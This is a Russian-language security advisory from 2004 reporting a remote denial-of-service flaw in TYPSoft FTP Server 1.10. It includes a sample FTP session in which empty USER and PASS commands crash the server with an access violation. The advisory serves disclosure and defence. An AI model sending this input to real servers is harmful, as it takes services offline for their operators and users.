Security Lab

Удаленный отказ в обслуживании против TYPSoft FTP Server

Дата публикации:06.02.2004
Всего просмотров:1333
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: TYPSoft FTP Server 1.10

Описание: Уязвимость обнаружена в TYPSoft FTP Server. Удаленный пользователь может аварийно завершить работу FTP сервера.

Удаленный пользователь может подключиться к целевой системе, и попытаться войти в систему с пустым именем пользователя, чтобы аварийно завершить работу FTP сервера.

Пример/Эксплоит:

220 TYPSoft FTP Server 1.10 ready...
USER
331 Password required for .
PASS
501 Access violation at address 77F526AB in module 'ntdll.dll'. 
Write of address 00404C4D

URL производителя: http://en.typsoft.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.